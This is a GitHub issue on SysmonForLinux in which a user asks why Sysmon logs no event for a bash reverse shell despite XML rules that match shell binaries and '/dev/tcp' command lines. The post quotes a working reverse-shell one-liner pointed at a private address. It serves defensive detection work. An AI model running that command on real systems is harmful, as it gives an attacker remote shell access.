SysmonForLinux icon indicating copy to clipboard operation
SysmonForLinux copied to clipboard

Published 20 hours ago verified publisher icon Sysinternals

Limited logging scope CommandLine attribute

Open vivami opened this issue 3 years ago • 0 comments

Description

I'm trying to detect the following basic bash reverse shell bash -i >& /dev/tcp/10.0.0.1/4242 0>&1. I have the following Sysmon rules enabled:

    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="include">
        <Rule name="TechniqueID=T1059.004,TechniqueName=Command and Scripting Interpreter: Unix Shell" groupRelation="or">
          <Image condition="end with">/bin/bash</Image>
          <Image condition="end with">/bin/dash</Image>
          <Image condition="end with">/bin/sh</Image>
        </Rule>
        <Rule name="TechniqueID=T1059.004,TechniqueName=Command and Scripting Interpreter: Reverse interpreter shell" groupRelation="or">
          <CommandLine condition="contains">/dev/tcp</CommandLine>
          <CommandLine condition="contains">/dev/udp</CommandLine>
        </Rule>
      </ProcessCreate>
    </RuleGroup>

Sysmon is not generating any events (in /var/log/syslog) and I'm not able to capture this reverse shell execution.

Expected result

I would expect Sysmon to generate an event containing <Data Name="CommandLine">-i >& /dev/tcp/10.0.0.1/4242 0>&1</Data>.

This is a known limitation, or am I not using the correct configuration?

vivami avatar Dec 31 '21 09:12 vivami